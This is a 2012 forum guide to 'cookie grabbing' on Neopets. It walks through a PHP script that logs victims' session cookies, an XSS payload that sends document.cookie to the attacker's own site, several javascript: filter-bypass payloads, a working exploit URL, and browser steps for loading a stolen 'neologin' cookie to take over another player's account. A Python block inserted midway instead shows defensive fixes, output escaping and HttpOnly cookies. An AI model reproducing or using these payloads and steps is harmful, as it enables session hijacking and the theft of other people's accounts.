Leet
Jan 13th, 2012
[CENTER][IMG]http://i.imgur.com/z7oww.jpg[/IMG][/CENTER]

First off, thank you to Inq for giving me a couple accounts to cookie grab.

Secondly, thank you to Kyo for his expertise; most of what I've learned is from him. The rest, I learned along the way. Now, onto the guide.

Thirdly, yes. You really are looking at a cookie grabbing guide. No, this guide will not kill the market. But maybe this might in Level 3...? Doesn't matter anyway.

Cross-site scripting (XSS) is possible when a site has insecure coding. When websites allow us to interact with them (e.g. search box, comment boxes, etc) and don't keep it secure, they render themselves vulnerable to code injection.

Many CGers take advantage of this and employ PHP and Javascript to snag the cookies. XSS itself isn't needed to CG, but it is just a step away from the PHP/JS.


[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Requirements[/B][/FONT][/SIZE][/COLOR]
Basic knowledge of HTML
A website host (nearlyfreespeech, tech.coop, netfirms, etc)


[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Writing the script[/B][/FONT][/SIZE][/COLOR]
People use PHP to retrieve the cookies and record them to a text file. A PHP script begins with [COLOR=#FF0000]<?php[/COLOR] and ends with [COLOR=#FF0000]?>[/COLOR].

[code]
<?php
header("Location: http://www.neopets.com/index.phtml");
// This is a redirect that takes the user to the specified link
// after they view the page the cookie-grabbing code is on.

$cookie = $_GET['cookie'];
// This reads the value named 'cookie' from the query string
// (the data is sent to this PHP file as a GET parameter).

$file = fopen('log.txt', 'a');
// This opens (or creates) a file named log.txt for appending.

fwrite($file, 'cookie: ' . $cookie);
// This writes the 'cookie' to the file.

fwrite($file, "\r\n");
// This is a line break.

fclose($file);
// This closes the file.
?>
[/code]
Sending anyone the link to your website with the script in it (1) snags their cookies, (2) records them in a log, and (3) redirects them to whatever link is specified.


[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Finding an exploit[/B][/FONT][/SIZE][/COLOR]
In any place where you can input a value, add [COLOR=#FF0000]<script>alert('1')</script>[/COLOR] to see if the site allows javascript. If you get a popup, then the site is vulnerable.

(Note: The demonstrated exploit has been patched.)

Take for example the below and its corresponding result:
[code]
http://www.neopets.com/coregtest.php?wat=<script>alert(1)</script>
[/code]
Bingo, a ‘1’ pops up.

[CENTER][IMG]http://i.imgur.com/KsKZM.png[/IMG][/CENTER]

Now try [COLOR=#FF0000]<script>alert(document.cookie)</script>[/COLOR]
[code]
http://www.neopets.com/coregtest.php?wat=<script>alert(document.cookie)</script>
[/code]

Now you should have a popup that shows you your cookies. The highlighted portion is the neologin, which is the only information we need.

[CENTER][IMG]http://i.imgur.com/9HyA6.jpg[/IMG][/CENTER]

You don’t actually write the data to the server unless you inject a script that modifies the page on the server’s end. The only thing you change is how the dynamic page acts on your end. As a result, when you send someone else the page, you have to send him or her the link with the injection already in that page.

Using this script will grab someone else’s cookies and log them on your site.
[code]
<script>document.location = 'http://www.yourwebsite.com/cger.php?cookie=' + escape(document.cookie);</script>
[/code]

Unfortunately, document.cookie is blocked on Neopets. There are/have been ways around this and alternatives (not listed).
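As an added illustration (not code from the original post or from Neopets), here is the reflected-parameter defect probed above with ?wat=<script>...</script> written as a minimal Python handler, next to the two server-side controls that break the chain: HTML-encoding the echoed value for the text context it lands in, and marking the session cookie HttpOnly, which is why document.cookie comes back empty on a site that sets it. The function names, the cookie value and the example.test host are assumptions.

```python
# Added illustration (not from the original post or from Neopets): the
# reflected-parameter defect the guide probes with ?wat=<script>..., next to
# the two server-side controls that break the cookie-grabbing chain.
from html import escape
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def render_vulnerable(url: str) -> str:
    """Echo the 'wat' query parameter straight into HTML (the bug)."""
    wat = parse_qs(urlsplit(url).query).get("wat", [""])[0]
    return f"<p>You searched for: {wat}</p>"


def render_hardened(url: str) -> str:
    """Same page, with the value HTML-encoded for the text context it lands in."""
    wat = parse_qs(urlsplit(url).query).get("wat", [""])[0]
    # escape() with quote=True neutralises <, >, &, " and ', so injected
    # markup is displayed as text instead of being parsed by the browser.
    return f"<p>You searched for: {escape(wat, quote=True)}</p>"


def session_cookie_header(name: str, value: str) -> str:
    """Build a Set-Cookie header for a session cookie that page script cannot read."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["httponly"] = True   # hides the cookie from document.cookie
    cookie[name]["secure"] = True     # only sent over HTTPS
    cookie[name]["samesite"] = "Lax"  # not attached to most cross-site navigations
    cookie[name]["path"] = "/"
    return cookie[name].OutputString()


if __name__ == "__main__":
    # Constructed probe URL; example.test is a placeholder host.
    probe = "http://example.test/coregtest.php?wat=<script>alert(1)</script>"
    print(render_vulnerable(probe))   # injected tag survives intact
    print(render_hardened(probe))     # tag is shown as &lt;script&gt;...
    print(session_cookie_header("neologin", "constructed-value"))
```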


[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Using the Cookies[/B][/FONT][/SIZE][/COLOR]
Now that you’ve got their cookies recorded, you need to use them. This is done by replacing your Neopets cookie with their cookie. Fortunately, we have addons to make it easy for us to do that.

[URL="https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/"][COLOR=#C94B23]FIREFOX: Add 'n' Edit Cookies (Click)[/COLOR][/URL]
[URL="https://chrome.google.com/webstore/detail/fngmhnnpilhplaeedifhccceomclgfbg"][COLOR=#2A7537]Chrome: Edit This Cookie (Click)[/COLOR][/URL]
[COLOR=#C94B23][B]FIREFOX VERSION:[/B][/COLOR] [spoiler]

After downloading, go to Tools > Cookie Editor.

[CENTER][IMG]http://i.imgur.com/DX90A.png[/IMG][/CENTER]

Filter for Neopets. From there, the only thing you need to change is the [B]neologin[/B].

[CENTER][IMG]http://i.imgur.com/clxH5.png[/IMG][/CENTER]

Take the hash that’s recorded in your log and change your current neologin to that one. If everything’s done correctly, you should be in their account.

[CENTER][IMG]http://i.imgur.com/lGUlR.png[/IMG][/CENTER]
[/spoiler]
[COLOR=#2A7537][B]CHROME VERSION:[/B][/COLOR][spoiler]

Click the Cookie icon next to your address bar to reveal a drop down bar showing all the cookies for the page you are on. (This means that you must be on a Neopets page in order to see Neopets cookies.)

From there, the only thing you need to change is the [B]neologin[/B]. Click on it, take the hash that’s recorded in your log and change your current neologin to that one. If everything’s done correctly, you should be in their account.

[CENTER][IMG]http://i.imgur.com/H6Tog.png[/IMG][/CENTER]
[/spoiler]
[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]How Did People Place Cookie Grabbers Onsite?[/B][/FONT][/SIZE][/COLOR]

Above, we discussed CGing that involved having someone click on a link that took them to an offsite page to snag their cookies. But how did people CG in the last petpage scare? This was mostly due to an error on TNT's part; you were able to link offsite by manipulating the battledome stats. This, of course, has since been patched due to rampant abuse.
[code]<a href="http%#BD_LOSTA//google.com">TEXT</a>[/code]

Once upon a time in a very distant past, you were able to cookie grab simply with an image, before the word "javascript" was blocked.
[code]<img src="javascript:alert('1');">[/code]

In a similar fashion...
[code]<body background="javascript:alert('1')">[/code]

Getting into CSS a bit...
[code]<div style="background-image: url(javascript:alert('1'))">[/code]

If you try these now though, you'll notice that TNT has banned the word "javascript". Even its hex form (6a6176617363726970743a616c6572742827312729) and its ASCII form (106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,39,49,39,41) are blocked. Still, there are ways. You just have to do some extra research, gain experience, and be clever.


[COLOR=#006400][SIZE=3][FONT=Book Antiqua][B]Conclusion[/B][/FONT][/SIZE][/COLOR]
Written by Leet. This is a basic guide on the steps involved, and you could very well start CGing people by linking them offsite. Additionally, it seeks to educate you on past methods and enlighten you on the flexibility of Javascript placement. Keep in mind, the biggest issue is actually getting a working onsite CGer.

Of note, there [I]have[/I] been rumors that someone is working on a cookie grabber where simply clicking on a thread in the BD Chat/Pound Chat/Trade Chat gets you CG'd... [I]cough[/I]. But alas, it's simply a rumor.

And just a reminder, Kyo generously posted a free, working exploit.
[code]http://www.neopets.com/challenges/world_gallery.phtml?world_id=10&edit=1%20onmouseover=alert(1)[/code][/spoiler]